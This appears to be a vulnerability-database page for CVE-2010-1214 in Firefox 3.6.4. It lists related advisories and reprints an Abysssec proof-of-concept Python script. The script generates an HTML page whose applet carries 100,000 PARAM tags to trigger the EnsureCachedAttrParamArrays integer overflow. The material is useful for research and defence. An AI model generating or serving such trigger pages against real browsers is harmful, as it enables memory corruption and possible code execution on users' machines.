Firefox Plugin Parameter EnsureCachedAttrParamArrays Code Execution from Apple
Reporter | Title | Published | Views | Family All 173 |
---|---|---|---|---|
Veracode | Arbitrary Code Execution | 10 Apr 202000:45 | – | veracode |
Check Point Advisories | Mozilla Products EnsureCachedAttrParamArrays Integer Overflow (CVE-2010-1214) | 14 Nov 201000:00 | – | checkpoint_advisories |
Prion | Integer overflow | 30 Jul 201020:30 | – | prion |
Prion | Memory corruption | 30 Jul 201013:26 | – | prion |
UbuntuCve | CVE-2010-1214 | 23 Jul 201000:00 | – | ubuntucve |
UbuntuCve | CVE-2010-2755 | 24 Jul 201000:00 | – | ubuntucve |
Exploit DB | Mozilla Firefox and SeaMonkey Plugin Parameters - Remote Buffer Overflow | 20 Jul 201000:00 | – | exploitdb |
Exploit DB | Mozilla Firefox 3.6.4 - 'Plugin' EnsureCachedAttrParamArrays Remote Code Execution | 17 Sep 201000:00 | – | exploitdb |
securityvulns | Mozilla Foundation Security Advisory 2010-37 | 24 Jul 201000:00 | – | securityvulns |
securityvulns | ZDI-10-132: Mozilla Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution Vulnerability | 24 Jul 201000:00 | – | securityvulns |
===================================================================
Firefox Plugin Parameter EnsureCachedAttrParamArrays Code Execution
===================================================================
Title : Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution
Version : Firefox 3.6.4
Analysis : http://www.abysssec.com
Vendor : http://www.mozilla.com
Impact : Critical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
CVE : CVE-2010-1214
'''
import sys;
myStyle = """
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>page demonstration</title>
<link rel="stylesheet" type="text/css" href="style2.css" />
</head>
<body id='msg'>
<applet code = 'appletComponentArch.DynamicTreeApplet' archive = 'DynamicTreeDemo.jar', width = 300, height = 300 >
"""
i=0
while(i<100000):
myStyle = myStyle + "<PARAM name='snd' value='Hello.au|Welcome.au'>\n";
i=i+1
myStyle = myStyle + """
</applet>
</body>
</html>
"""
cssFile = open("Abysssec.html","w")
cssFile.write(myStyle)
cssFile.close()
# 0day.today [2018-03-12] #
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo